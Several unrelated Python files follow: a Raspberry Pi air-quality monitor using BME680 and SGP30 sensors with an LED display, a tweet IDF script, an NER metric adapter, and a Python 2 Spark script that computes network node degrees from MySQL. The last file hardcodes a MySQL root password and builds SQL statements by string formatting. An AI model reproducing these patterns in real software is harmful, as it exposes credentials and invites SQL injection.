def fn_bme680(self):
def __bme680_comfort():
# BETA
temp = int(self.bme680_temperature)
hum = int(self.bme680_humidity)
if temp < 20 and hum < 30: print("__bme680_comfort 1 *** The air is dry, unhappy / L'aria è secca, infelice")
elif temp < 20 and 30 <= hum <= 60: print("__bme680_comfort 2 *** Slightly cool and moist, moderate comfort / Leggermente fresco e umido, comfort moderato")
elif temp < 20 and hum > 60: print("__bme680_comfort 3 *** Air-cooled, comfortable in general / Raffreddato ad aria, confortevole in generale")
elif 20 <= temp <= 24 and hum < 30: print("__bme680_comfort 4 *** The air is dry, unhappy / L'aria è secca, infelice")
elif 20 <= temp <= 24 and 30 <= hum <= 60: print("__bme680_comfort 5 *** Fresh and comfortable, feeling great / Fresco e confortevole, sentirsi benissimo")
elif 20 <= temp <= 24 and hum > 60: print("__bme680_comfort 6 *** Air-cooled, comfortable in general / Raffreddato ad aria, confortevole in generale")
elif temp > 24 and hum < 30: print("__bme680_comfort 7 *** Hot and dry, need more water / Caldo e asciutto, serve più acqua")
elif temp > 24 and 30 <= hum <= 60: print("__bme680_comfort 8 *** Hot and dry, need more water / Caldo e asciutto, serve più acqua")
elif temp > 24 and hum > 60: print("__bme680_comfort 9 *** Hot and humid, poor comfort / Caldo e umido, scarso comfort")
else: print("__bme680_comfort 10 *** NO DATA!")
def __bme680_iaq():
hum = self.bme680_humidity
gas_bme = self.bme680_gas
gas_offset = self.bme680_gas_baseline - gas_bme
hum_offset = hum - self.bme680_humidity_baseline
if hum_offset > 0:
hum_score = (100 - self.bme680_humidity_baseline - hum_offset)
hum_score /= (100 - self.bme680_humidity_baseline)
hum_score *= (self.bme680_humidity_weighting * 100)
else:
hum_score = (self.bme680_humidity_baseline + hum_offset)
hum_score /= self.bme680_humidity_baseline
hum_score *= (self.bme680_humidity_weighting * 100)
if gas_offset > 0:
gas_score = (gas_bme / self.bme680_gas_baseline)
gas_score *= (100 - (self.bme680_humidity_weighting * 100))
else:
gas_score = 100 - (self.bme680_humidity_weighting * 100)
self.bme680_aqs = hum_score + gas_score
print("*** BME680 *** temperature {0:.2f} C *** humidity {1:.2f} %RH *** gas {2:.2f} Ohms *** IAQ {3:.2f} ***".format(self.bme680_temperature, self.bme680_humidity, self.bme680_gas, self.bme680_aqs))
def __bme680_sense():
while True:
if self.bme680_data.get_sensor_data():
self.bme680_temperature = self.bme680_data.data.temperature
self.bme680_humidity = self.bme680_data.data.humidity
__bme680_comfort()
if self.bme680_data.data.heat_stable:
self.bme680_gas = self.bme680_data.data.gas_resistance
__bme680_iaq()
else: print("*** BME680 partial values ...")
else: print("*** BME680 not ready ...")
time.sleep(1)
def __bme680_burn_in():
print("*** BME680 burn-in ...")
gas_burn = ""
bme680_burn_data = []
self.bme680_start_time = time.time()
# self.bme680_end_time = self.bme680_start_time + self.bme680_burn_in_time
while self.bme680_curr_time - self.bme680_start_time < self.bme680_burn_in_time:
self.bme680_curr_time = time.time()
if self.bme680_data.get_sensor_data() and self.bme680_data.data.heat_stable:
self.burn_in_mode = 1
gas_burn = self.bme680_data.data.gas_resistance
bme680_burn_data.append(gas_burn)
if len(bme680_burn_data) > 60: bme680_burn_data = bme680_burn_data[-60:]
else: pass
# print("*** BME680 *** gas {0:.2f} Ohms ***".format(gas_burn))
time.sleep(1)
else:
self.burn_in_mode = 0
print("*** BME680 not ready ...")
else:
self.bme680_gas_baseline = sum(bme680_burn_data[-60:]) / 60.0
self.burn_in_mode = 2
del gas_burn
del bme680_burn_data[:]
del bme680_burn_data
bme680_burn_data = {"bme680": []}
# print("\n*** BME680 baseline *** gas {0:.2f} Ohms *** humidity {1:.2f} %RH ***".format(self.bme680_gas_baseline, self.bme680_humidity_baseline))
__bme680_sense()
__bme680_burn_in()
def fn_sgp30(self):
# self.sgp30.command('set_baseline', (0xFECA, 0xBEBA)) # (0x8973, 0x8AAE)
self.sgp30.start_measurement()
command_time_1 = command_time_2 = 0
# sgp30_baseline = []
# print(["*** SGP30 *** old baseline {:02x} ***".format(n) for n in self.sgp30.command('get_baseline')])
while True:
data_sgp30 = self.sgp30.get_air_quality()
self.data_sgp30_equivalent_co2 = data_sgp30.equivalent_co2
self.data_sgp30_total_voc = data_sgp30.total_voc
# print("*** SGP30 *** eCO2 {0} ppm *** TVOC *** {1} ppb ***".format(self.data_sgp30_equivalent_co2, self.data_sgp30_total_voc))
command_time_1 += 1
command_time_2 += 1
if command_time_1 == 360: # 1 ORA = 3600
# sgp30_baseline = self.sgp30.command('get_baseline') # CO2, TVOC
# self.sgp30.command('set_baseline', (sgp30_baseline[1], sgp30_baseline[0])) # TVOC, CO2 REVERSE ORDER
# print(["*** SGP30 *** new baseline {:02x} ***".format(n) for n in self.sgp30.command('get_baseline')])
command_time_1 = 0
else: pass
if command_time_2 == 180:
if self.bme680_humidity > 0 and self.bme680_temperature > 0:
hum = self.bme680_humidity
temp = self.bme680_temperature
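                    # convert relative humidity (%) and temperature (C) to absolute humidity
                    # via the Magnus formula (g/m^3), scaled x1000 before handing it to the
                    # SGP30 humidity-compensation command below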
absolute_hum = int(1000 * 216.7 * (hum / 100 * 6.112 * math.exp(17.62 * temp / (243.12 + temp))) / (273.15 + temp))
self.sgp30.command('set_humidity', [absolute_hum])
print("*** SGP30 *** set humidity ...")
else: pass
command_time_2 = 0
else: pass
time.sleep(1)
def fn_current_value(self, element_arg_1 = "", element_arg_2 = 0, element_arg_3 = ""):
''' message_1 = "{}".format(element_arg_1) # element_arg_1[:5]
message_2 = "{}".format(element_arg_2)
message_3 = "{}".format(element_arg_3) '''
print(f"*** {element_arg_1} {element_arg_2} {element_arg_3} ***")
range_limits = self.the_elements_range[self.button_mode]
range_limits_len = len(range_limits)
self.the_rgb = self.the_elements_palette_1[self.button_mode][0]
self.led_brightness_2 = self.led_brightness_1[self.button_mode][0]
for j in range(range_limits_len):
if int(element_arg_2) > range_limits[j]:
self.the_rgb = self.the_elements_palette_1[self.button_mode][j + 1]
self.led_brightness_2 = self.led_brightness_1[self.button_mode][j + 1]
else: pass
def fn_led_1(self):
led_rgb_2 = [0, 0, 0]
def __next_colour(the_rgb):
self.led_act = 1
            while len(self.the_rgb) == 2 and (led_rgb_2[0] != the_rgb[0] or led_rgb_2[1] != the_rgb[1] or led_rgb_2[2] != the_rgb[2]):
if led_rgb_2[0] > the_rgb[0]: led_rgb_2[0] -= 1
elif led_rgb_2[0] < the_rgb[0]: led_rgb_2[0] += 1
else: pass
if led_rgb_2[1] > the_rgb[1]: led_rgb_2[1] -= 1
elif led_rgb_2[1] < the_rgb[1]: led_rgb_2[1] += 1
else: pass
if led_rgb_2[2] > the_rgb[2]: led_rgb_2[2] -= 1
elif led_rgb_2[2] < the_rgb[2]: led_rgb_2[2] += 1
else: pass
self.unicornhatmini.set_all(led_rgb_2[0], led_rgb_2[1], led_rgb_2[2])
self.unicornhatmini.show()
self.led_act = 0
led_cur_width = led_brightness_3 = 0
led_rgb = [0, 0, 0]
i = 0.00
load_line = int(self.bme680_burn_in_time / 17) + 1
for x in range(0, 17):
for y in range(0, 7):
self.unicornhatmini.set_pixel(x, y, 255, 255, 255)
if self.burn_in_mode == 0:
while self.burn_in_mode == 0: pass
else: pass
elif self.burn_in_mode == 2: load_line = 0.5
else: pass
self.unicornhatmini.show()
print("*** ", 17 - x)
time.sleep(load_line) # time.sleep(0.5 / 17)
self.unicornhatmini.clear()
while True:
if len(self.the_rgb) == 3:
while len(self.the_rgb) == 3 and i <= 10: # for i in range(0, 10, 1):
i += 0.50
if led_rgb == self.the_rgb and led_brightness_3 == self.led_brightness_2:
if led_brightness_3 == 0: led_cur_width = 0.2
elif 0.09 <= led_brightness_3 <= 0.15: led_cur_width = i / 10.0
else: led_cur_width = i / 30.0
self.unicornhatmini.set_brightness(led_cur_width)
self.unicornhatmini.set_all(led_rgb[0], led_rgb[1], led_rgb[2])
self.unicornhatmini.show()
time.sleep(led_brightness_3)
else:
# buttonshim.set_pixel(0, 0, 0)
# buttonshim.set_brightness(0)
led_rgb = self.the_rgb
led_brightness_3 = self.led_brightness_2
break
else:
while len(self.the_rgb) == 3 and i >= 1: # for i in range(10, 0, -1):
i -= 0.50
if led_brightness_3 == 0: led_cur_width = 0.2
elif 0.09 <= led_brightness_3 <= 0.15: led_cur_width = i / 10.0
else: led_cur_width = i / 30.0
self.unicornhatmini.set_brightness(led_cur_width)
self.unicornhatmini.set_all(led_rgb[0], led_rgb[1], led_rgb[2])
self.unicornhatmini.show()
time.sleep(led_brightness_3)
else: pass
elif len(self.the_rgb) == 2:
print("****** fn_led_1 ELSE")
for c_1 in range(0, 2, 1):
if len(self.the_rgb) == 2 and self.led_act == 0:
__next_colour((self.the_rgb[c_1][0], self.the_rgb[c_1][1], self.the_rgb[c_1][2]))
else: pass
for c_2 in reversed(range(0, 2, 1)):
if len(self.the_rgb) == 2 and self.led_act == 0:
__next_colour((self.the_rgb[c_2][0], self.the_rgb[c_2][1], self.the_rgb[c_2][2]))
else: pass
else: pass
def fn_button_pressed(self):
while True:
if self.burn_in_mode == 2:
if self.button_a.is_pressed:
self.button_a.wait_for_release(timeout = 1)
self.press_act = 1
self.button_mode -= 1
elif self.button_b.is_pressed:
self.button_b.wait_for_release(timeout = 1)
self.press_act = 1
self.button_mode += 1
elif self.button_x.is_pressed:
self.button_x.wait_for_release(timeout = 1)
self.press_act = 0
self.unicornhatmini.set_brightness(0)
self.unicornhatmini.clear()
self.the_rgb = (0, 0, 0)
elif self.button_y.is_pressed:
self.button_y.wait_for_release(timeout = 1)
self.press_act = 0
self.unicornhatmini.set_brightness(0)
self.unicornhatmini.clear()
self.the_rgb = (0, 0, 0)
call("sudo shutdown -P -t 0.3", shell=True) # call("sudo shutdown -P -t 1", shell=True)
sys.exit(0)
else: pass
self.button_mode %= len(self.the_elements)
else:
self.press_act = 1
self.button_mode = 0
if self.button_mode == 0 and self.press_act == 1: self.fn_current_value(str("{0:02d}".format(self.rtc_now.day) + "." + "{0:02d}".format(self.rtc_now.month) + "." + "{0:02d}".format(self.rtc_now.year)[-2:]), int("{0:02d}".format(self.rtc_now.hour) + "{0:02d}".format(self.rtc_now.minute)), "")
elif self.button_mode == 1 and self.press_act == 1: self.fn_current_value("TEMP", int(self.bme680_temperature), "C") # self.fn_current_value("TEMP", round(self.bme680_temperature, 1), "C")
elif self.button_mode == 2 and self.press_act == 1: self.fn_current_value("RH", int(self.bme680_humidity), "%")
elif self.button_mode == 3 and self.press_act == 1: self.fn_current_value("eCO2", int(self.data_sgp30_equivalent_co2), "ppm")
elif self.button_mode == 4 and self.press_act == 1: self.fn_current_value("TVOC", int(self.data_sgp30_total_voc), "ppb")
elif self.button_mode == 5 and self.press_act == 1: self.fn_current_value("VOC IAQ", int(self.bme680_aqs), "%")
else: pass
time.sleep(0.1)
def fn_thread_go(self): # non-random ordering
t0 = Thread(target = self.fn_rv3028)
t0.setDaemon(True)
t0.start()
t1 = Thread(target = self.fn_bme680)
t1.setDaemon(True)
t1.start()
t2 = Thread(target = self.fn_sgp30)
t2.setDaemon(True)
t2.start()
t3 = Thread(target = self.fn_led_1)
t3.setDaemon(True)
t3.start()
t4 = Thread(target = self.fn_button_pressed)
t4.setDaemon(False) # BUTTON FN NO DAEMON!
t4.start()
if __name__ == "__main__":
try: DIYzenIAQ()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
except Exception as e:
print("*** ERROR: {0} ***".format(str(e)))
print("*** RELOAD ...")
os.execl(sys.executable, "python3", __file__, *sys.argv[1:])
sys.exit(0)
|
from signews.vectorizer import TFIDF
from signews.database import Tweet
def calculate_idf():
# Obtain all tweets
tweet_objects = Tweet.select(Tweet.body)
tweets = [tweet.body for tweet in tweet_objects]
tf_idf_vectorizer = TFIDF()
tf_idf_vectorizer.calculate_idf(tweets)
    # Store the word and its IDF value in a file
tf_idf_vectorizer.save_word_idf()
if __name__ == "__main__":
calculate_idf()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 PanXu, Inc. All Rights Reserved
#
"""
ner metric
Authors: PanXu
Date: 2020/06/27 20:48:00
"""
from typing import Tuple, Dict, Union, List
from torch import Tensor
from torch.distributed import ReduceOp
from easytext.metrics import ModelMetricAdapter, ModelTargetMetric
from easytext.metrics import SpanF1Metric
from easytext.label_decoder import ModelLabelDecoder
from easytext.component.register import ComponentRegister
from ner.data.vocabulary_builder import VocabularyBuilder
from ner.models import NerModelOutputs
@ComponentRegister.register(name_space="ner")
class NerModelMetricAdapter(ModelMetricAdapter):
"""
Ner Model Metric Adapter
    Computes the Ner Model Metric.
"""
def __init__(self,
vocabulary_builder: VocabularyBuilder,
model_label_decoder: ModelLabelDecoder):
self.span_f1_metric = SpanF1Metric(vocabulary_builder.label_vocabulary)
self.model_label_decoder = model_label_decoder
def __call__(self, model_outputs: NerModelOutputs, golden_labels: Tensor) -> Tuple[Dict, ModelTargetMetric]:
model_outputs: NerModelOutputs = model_outputs
prediction_labels = self.model_label_decoder.decode_label_index(model_outputs=model_outputs)
metric_dict = self.span_f1_metric(prediction_labels=prediction_labels,
gold_labels=golden_labels,
mask=model_outputs.mask)
target_metric = ModelTargetMetric(metric_name=SpanF1Metric.F1_OVERALL,
metric_value=metric_dict[SpanF1Metric.F1_OVERALL])
return metric_dict, target_metric
@property
def metric(self) -> Tuple[Dict, ModelTargetMetric]:
target_metric = ModelTargetMetric(metric_name=SpanF1Metric.F1_OVERALL,
metric_value=self.span_f1_metric.metric[SpanF1Metric.F1_OVERALL])
return self.span_f1_metric.metric, target_metric
def reset(self) -> "NerModelMetricAdapter":
self.span_f1_metric.reset()
return self
def to_synchronized_data(self) -> Tuple[Union[Dict[Union[str, int], Tensor], List[Tensor], Tensor], ReduceOp]:
return self.span_f1_metric.to_synchronized_data()
def from_synchronized_data(self, sync_data: Union[Dict[Union[str, int], Tensor], List[Tensor], Tensor],
reduce_op: ReduceOp) -> None:
self.span_f1_metric.from_synchronized_data(sync_data=sync_data, reduce_op=reduce_op)
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
################################### PART0 DESCRIPTION #################################
# Filename: class_read_csv_input_data_save_word_to_database.py
# Description:
#
# Author: Shuai Yuan
# E-mail: ysh329@sina.com
# Create: 2015-12-06 15:22:38
# Last:
__author__ = 'yuens'
################################### PART1 IMPORT ######################################
import logging
import MySQLdb
import time
from operator import add
import networkx as nx
################################### PART2 CLASS && FUNCTION ###########################
class ComputeNodeProperty(object):
def __init__(self, database_name, pyspark_sc):
self.start = time.clock()
logging.basicConfig(level = logging.INFO,
format = '%(asctime)s %(levelname)5s %(filename)19s[line:%(lineno)3d] %(funcName)s %(message)s',
datefmt = '%y-%m-%d %H:%M:%S',
filename = './main.log',
filemode = 'a')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)5s %(filename)19s[line:%(lineno)3d] %(funcName)s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.info("START CLASS {class_name}.".format(class_name = ComputeNodeProperty.__name__))
# connect database
try:
self.con = MySQLdb.connect(host='localhost', user='root', passwd='931209', db = database_name, charset='utf8')
logging.info("Success in connecting MySQL.")
except MySQLdb.Error, e:
logging.error("Fail in connecting MySQL.")
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
# spark configure
try:
self.sc = pyspark_sc
logging.info("Config spark successfully.")
except Exception as e:
logging.error("Config spark failed.")
logging.error(e)
def __del__(self):
# close database
try:
self.con.close()
logging.info("Success in quiting MySQL.")
except MySQLdb.Error, e:
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
logging.info("END CLASS {class_name}.".format(class_name = ComputeNodeProperty.__name__))
self.end = time.clock()
logging.info("The class {class_name} run time is : {delta_time} seconds".format(class_name = ComputeNodeProperty.__name__, delta_time = self.end))
def read_connection_data_in_database(self, database_name, connection_table_name):
cursor = self.con.cursor()
sqls = []
sqls.append("""USE {0}""".format(database_name))
sqls.append("""SELECT network_type, is_directed, connection_id, node1, node2 FROM {database}.{table}"""\
.format(database = database_name, table = connection_table_name)\
)
for sql_idx in xrange(len(sqls)):
sql = sqls[sql_idx]
try:
cursor.execute(sql)
if sql_idx == len(sqls)-1:
connection_data_2d_tuple = cursor.fetchall()
logging.info("len(connection_data_2d_tuple):{0}".format(len(connection_data_2d_tuple)))
logging.info("type(connection_data_2d_tuple):{0}".format(type(connection_data_2d_tuple)))
logging.info("connection_data_2d_tuple[:10]:{0}".format(connection_data_2d_tuple[:10]))
logging.info("type(connection_data_2d_tuple[0]):{0}".format(type(connection_data_2d_tuple[0])))
except MySQLdb.Error, e:
self.con.rollback()
logging.error("Fail in attaining connection data from {database_name}.{table_name}.".format(database_name = database_name, table_name = connection_table_name))
logging.error("MySQL Error {error_num}: {error_info}.".format(error_num = e.args[0], error_info = e.args[1]))
return 0
cursor.close()
# transform to rdd
connection_data_tuple_rdd = self.sc.parallelize(connection_data_2d_tuple)\
.map(lambda (network_type, is_directed, connection_id, node1, node2):\
(network_type.encode("utf8"),\
int(is_directed),\
int(connection_id),\
int(node1),\
int(node2))\
)
logging.info("connection_data_tuple_rdd.count():{0}".format(connection_data_tuple_rdd.count()))
logging.info("connection_data_tuple_rdd.take(3):{0}".format(connection_data_tuple_rdd.take(3)))
# transform to six different rdd
## bio network
bio_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "bio" and is_directed == 1)
logging.info("bio_directed_tuple_rdd.count():{0}".format(bio_directed_tuple_rdd.count()))
logging.info("bio_directed_tuple_rdd.take(3):{0}".format(bio_directed_tuple_rdd.take(3)))
bio_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "bio" and is_directed == 0)
logging.info("bio_undirected_tuple_rdd.count():{0}".format(bio_undirected_tuple_rdd.count()))
logging.info("bio_undirected_tuple_rdd.take(3):{0}".format(bio_undirected_tuple_rdd.take(3)))
# info network
info_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "info" and is_directed == 1)
logging.info("info_directed_tuple_rdd.count():{0}".format(info_directed_tuple_rdd.count()))
logging.info("info_directed_tuple_rdd.take(3):{0}".format(info_directed_tuple_rdd.take(3)))
info_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "info" and is_directed == 0)
logging.info("info_undirected_tuple_rdd.count():{0}".format(info_undirected_tuple_rdd.count()))
logging.info("info_undirected_tuple_rdd.take(3):{0}".format(info_undirected_tuple_rdd.take(3)))
# social network
social_directed_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "social" and is_directed == 1)
logging.info("social_directed_tuple_rdd.count():{0}".format(social_directed_tuple_rdd.count()))
logging.info("social_directed_tuple_rdd.take(3):{0}".format(social_directed_tuple_rdd.take(3)))
social_undirected_tuple_rdd = connection_data_tuple_rdd.filter(lambda (network_type, is_directed, connection_id, node1, node2): network_type == "social" and is_directed == 0)
logging.info("social_undirected_tuple_rdd.take(3):{0}".format(social_undirected_tuple_rdd.count()))
logging.info("social_undirected_tuple_rdd.take(3):{0}".format(social_undirected_tuple_rdd.take(3)))
network_rdd_list = [bio_directed_tuple_rdd, bio_undirected_tuple_rdd,\
info_directed_tuple_rdd, info_undirected_tuple_rdd,\
social_directed_tuple_rdd, social_undirected_tuple_rdd]
return network_rdd_list
def compute_degree_in_different_network(self, network_rdd_list):
# sub-function
def compute_degree_in_undirected_network(network_data_tuple_rdd):
try:
node_and_degree_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))\
.flatMap(lambda node_tuple: [node_tuple[0], node_tuple[1]])\
.map(lambda node: (node, 1))\
.reduceByKey(add)\
.sortBy(lambda (node, degree): degree, False)
logging.info("node_and_degree_tuple_rdd.count():{0}".format(node_and_degree_tuple_rdd.count()))
logging.info("node_and_degree_tuple_rdd.take(3):{0}".format(node_and_degree_tuple_rdd.take(3)))
except Exception as e:
logging.error(e)
return None
return node_and_degree_tuple_rdd
# sub-function
def compute_degree_in_directed_network(network_data_tuple_rdd):
try:
node_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))
logging.info("node_tuple_rdd.count():{0}".format(node_tuple_rdd.count()))
logging.info("node_tuple_rdd.take(3):{0}".format(node_tuple_rdd.take(3)))
node_and_in_degree_rdd = node_tuple_rdd\
.map(lambda (node_in, node_out): (node_in, 1))\
.reduceByKey(add)
logging.info("node_and_in_degree_rdd.count():{0}".format(node_and_in_degree_rdd.count()))
logging.info("node_and_in_degree_rdd.take(3):{0}".format(node_and_in_degree_rdd.take(3)))
node_and_out_degree_rdd = node_tuple_rdd\
.map(lambda (node_in, node_out): (node_out, 1))\
.reduceByKey(add)
logging.info("node_and_out_degree_rdd.count():{0}".format(node_and_out_degree_rdd.count()))
logging.info("node_and_out_degree_rdd.take(3):{0}".format(node_and_out_degree_rdd.take(3)))
node_and_in_and_out_degree_tuple_rdd = node_and_in_degree_rdd\
.fullOuterJoin(node_and_out_degree_rdd)\
.map(lambda (node, (in_degree, out_degree)): (node, 0 if in_degree == None else in_degree, 0 if out_degree == None else out_degree))\
.sortBy(lambda (node, in_degree, out_degree): out_degree, False)
logging.info("node_and_in_and_out_degree_tuple_rdd.count():{0}".format(node_and_in_and_out_degree_tuple_rdd.count()))
logging.info("node_and_in_and_out_degree_tuple_rdd.take(3):{0}".format(node_and_in_and_out_degree_tuple_rdd.take(3)))
except Exception as e:
logging.error("Compute degree failed in directed network.")
logging.error(e)
return None
return node_and_in_and_out_degree_tuple_rdd
# sub-function
def compute_node_num_in_network(network_data_tuple_rdd):
try:
if network_data_tuple_rdd.take(1)[0][1] == 1: # directed
node_and_in_and_out_degree_tuple_rdd = compute_degree_in_directed_network(network_data_tuple_rdd)
node_num_in_network = node_and_in_and_out_degree_tuple_rdd.count()
return node_num_in_network, node_and_in_and_out_degree_tuple_rdd
else: # undirected
node_and_degree_tuple_rdd = compute_degree_in_undirected_network(network_data_tuple_rdd)
node_num_in_network = node_and_degree_tuple_rdd.count()
return node_num_in_network, node_and_degree_tuple_rdd
except Exception as e:
logging.error("Compute node number failed in network.")
logging.error(e)
return None
# sub-function
def compute_normalized_degree_in_network(network_data_tuple_rdd):
try:
#print "network_data_tuple_rdd.take(1):{0}".format(network_data_tuple_rdd.take(1))
if network_data_tuple_rdd.take(1)[0][1] == 1: # directed
node_num_in_network, node_and_in_and_out_degree_tuple_rdd = compute_node_num_in_network(network_data_tuple_rdd)
logging.info("node_num_in_network:{0}".format(node_num_in_network))
logging.info("node_and_in_and_out_degree_tuple_rdd.take(3):{0}".format(node_and_in_and_out_degree_tuple_rdd.take(3)))
node_data_tuple_rdd = node_and_in_and_out_degree_tuple_rdd\
.map(lambda (node, in_degree, out_degree):(node,\
(in_degree+out_degree,\
in_degree,\
out_degree,\
float(in_degree)/(in_degree+out_degree) if (in_degree+out_degree) != 0 else 0.0,\
float(out_degree)/node_num_in_network\
)\
)\
)\
.sortBy(lambda (node, (degree, in_degree, out_degree, in_degree_rate, normalized_degree)): normalized_degree, False)\
.fullOuterJoin(compute_degree_str_in_network(network_data_tuple_rdd))\
.map(lambda (node,\
((degree, in_degree, out_degree, in_degree_rate, normalized_degree),\
(all_degree_str, in_degree_str, out_degree_str)\
)\
): (node,\
all_degree_str,\
degree,\
in_degree_str,\
in_degree,\
out_degree_str,\
out_degree,\
in_degree_rate,\
normalized_degree\
)\
)
logging.info("node_data_tuple_rdd.take(3):{0}".format(node_data_tuple_rdd.take(3)))
else: # undirected
node_num_in_network, node_and_degree_tuple_rdd = compute_node_num_in_network(network_data_tuple_rdd)
logging.info("node_num_in_network:{0}".format(node_num_in_network))
logging.info("node_and_degree_tuple_rdd.take(3):{0}".format(node_and_degree_tuple_rdd.take(3)))
node_data_tuple_rdd = node_and_degree_tuple_rdd\
.map(lambda (node, degree): (node, (degree, 0, 0, 0.0, float(degree) / node_num_in_network) ) )\
.sortBy(lambda (node, (degree, in_degree, out_degree, in_degree_rate, normalized_degree)): normalized_degree, False)\
.fullOuterJoin(compute_degree_str_in_network(network_data_tuple_rdd))\
.map(lambda (node,\
((degree, in_degree, out_degree, in_degree_rate, normalized_degree),\
(all_degree_str, in_degree_str, out_degree_str)\
)\
): (node,\
all_degree_str,\
degree,\
in_degree_str,\
in_degree,\
out_degree_str,\
out_degree,\
in_degree_rate,\
normalized_degree\
)\
)
logging.info("node_data_tuple_rdd.take(3):{0}".format(node_data_tuple_rdd.take(3)))
except Exception as e:
logging.error("Compute normalized degree failed in network.")
logging.error(e)
return None
return node_data_tuple_rdd
# sub-function
def compute_degree_str_in_network(network_data_tuple_rdd):
try:
                # applies whether the network is directed or undirected
node1_and_node2_tuple_rdd = network_data_tuple_rdd\
.map(lambda (network_type, is_directed, connection_id, node1, node2): (node1, node2))
node_and_in_degree_str_tuple_rdd = node1_and_node2_tuple_rdd\
.map(lambda (node1, node2): (node2, node1))\
.reduceByKey(lambda in_node1, in_node2: str(in_node1)+"///"+str(in_node2))\
.map(lambda (node, in_degree_str): (node, str(in_degree_str)))
#logging.info("node_and_in_degree_str_tuple_rdd.take(3):{0}".format(node_and_in_degree_str_tuple_rdd.take(3)))
node_and_out_degree_str_tuple_rdd = node1_and_node2_tuple_rdd\
.map(lambda (node1, node2): (node1, node2))\
.reduceByKey(lambda out_node1, out_node2: str(out_node1)+"///"+str(out_node2))\
.map(lambda (node, in_degree_str): (node, str(in_degree_str)))
#logging.info("node_and_out_degree_str_tuple_rdd.take(3):{0}".format(node_and_out_degree_str_tuple_rdd.take(3)))
node_and_in_and_out_degree_str_tuple_rdd = node_and_in_degree_str_tuple_rdd\
.fullOuterJoin(node_and_out_degree_str_tuple_rdd)\
.map(lambda (node, (in_degree_str, out_degree_str)): (node,\
"" if in_degree_str == None else in_degree_str,\
"" if out_degree_str == None else out_degree_str\
)\
)
node_and_all_and_in_and_out_degree_str_tuple_rdd = node_and_in_and_out_degree_str_tuple_rdd\
.map(lambda (node, in_degree_str, out_degree_str): (node,\
("///".join([i for i in set(in_degree_str.split("///")+out_degree_str.split("///")) if i!=""]),\
in_degree_str,\
out_degree_str\
)\
)\
)
except Exception as e:
logging.error("failed to compute degree string in network.")
logging.error(e)
return None
return node_and_all_and_in_and_out_degree_str_tuple_rdd
bio_directed_tuple_rdd, bio_undirected_tuple_rdd = network_rdd_list[0], network_rdd_list[1]
info_directed_tuple_rdd, info_undirected_tuple_rdd = network_rdd_list[2], network_rdd_list[3]
social_directed_tuple_rdd, social_undirected_tuple_rdd = network_rdd_list[4], network_rdd_list[5]
# (node, degree, in_degree, out_degree, in_degree_rate, normalized_degree)
bio_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = bio_directed_tuple_rdd)
bio_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = bio_undirected_tuple_rdd)
info_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = info_directed_tuple_rdd)
info_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = info_undirected_tuple_rdd)
social_directed_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = social_directed_tuple_rdd)
social_undirected_node_data_tuple_rdd = compute_normalized_degree_in_network(network_data_tuple_rdd = social_undirected_tuple_rdd)
# Merge them into one list
node_data_rdd_list = [bio_directed_node_data_tuple_rdd, bio_undirected_node_data_tuple_rdd,\
info_directed_node_data_tuple_rdd, info_undirected_node_data_tuple_rdd,\
social_directed_node_data_tuple_rdd, social_undirected_node_data_tuple_rdd]
return node_data_rdd_list
def save_node_data_rdd_list_to_database(self, database_name, node_table_name, node_data_rdd_list):
# sub-function
# (node, all_degree_str, degree_num, in_degree_str, in_degree_num,
# out_degree_str, out_degree_num, in_degree_rate, normalized_degree)
def sql_generator(database_name, node_table_name, network_type, is_directed, node_data_tuple):
node = node_data_tuple[0]
degree_str = node_data_tuple[1]
degree_num = node_data_tuple[2]
in_degree_str = node_data_tuple[3]
in_degree_num = node_data_tuple[4]
out_degree_str = node_data_tuple[5]
out_degree_num = node_data_tuple[6]
in_degree_rate = float(out_degree_num)/(in_degree_num+out_degree_num) if out_degree_num != 0 else 0#node_data_tuple[7]
normalized_degree = node_data_tuple[8]
try:
sql = """INSERT INTO {database_name}.{table_name}(node, network_type, is_directed, degree_str, degree_num,
in_degree_str, in_degree_num,
out_degree_str, out_degree_num,
in_degree_rate, normalized_degree)
VALUES({node}, '{network_type}', {is_directed}, '{degree_str}', {degree_num},
'{in_degree_str}', {in_degree_num},
'{out_degree_str}', {out_degree_num},
{in_degree_rate}, {normalized_degree})"""\
.format(database_name = database_name,\
table_name = node_table_name,\
node = node, network_type = network_type, is_directed = is_directed,\
degree_str = degree_str, degree_num = degree_num,\
                            in_degree_str = in_degree_str, in_degree_num = in_degree_num,\
                            out_degree_str = out_degree_str, out_degree_num = out_degree_num,\
in_degree_rate = in_degree_rate, normalized_degree = normalized_degree\
)
except Exception as e:
logging.error("failed to generate sql.")
logging.error(e)
return sql
bio_directed_node_data_tuple_rdd, bio_undirected_node_data_tuple_rdd = node_data_rdd_list[0], node_data_rdd_list[1]
info_directed_node_data_tuple_rdd, info_undirected_node_data_tuple_rdd = node_data_rdd_list[2], node_data_rdd_list[3]
social_directed_node_data_tuple_rdd, social_undirected_node_data_tuple_rdd = node_data_rdd_list[4], node_data_rdd_list[5]
# generate sql from rdd
